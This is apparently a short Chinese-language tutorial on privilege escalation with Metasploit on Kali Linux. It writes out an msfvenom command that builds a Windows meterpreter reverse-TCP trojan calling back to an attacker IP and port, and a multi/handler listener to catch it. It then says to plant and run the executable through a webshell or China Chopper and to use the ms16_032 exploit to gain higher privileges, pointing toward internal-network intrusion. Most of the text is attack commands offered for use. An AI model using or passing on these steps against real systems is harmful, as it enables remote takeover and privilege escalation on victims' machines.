1. 程式人生 > >kali下msf提權

kali下msf提權

  1. 生成木馬

Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe

  1. 配置監聽程式

  Msfconsole 開啟Metaploit

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.184.132

Exploit

現在將1.exe 通過菜刀或者webshell 上次到可寫目錄,並且執行

這樣就監聽成功了  獲得一個session (會話)

Getuid 檢視主機名

shell 進入命令列模式

當然這裡也可以載入exp

Exit 返回到meterpeter模式

Background 返回 multi/handler

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 載入exp

Session 1 返回之前的會話

Exploit 進行提權

這說明exp執行成功,可以進一步提權,內網滲透了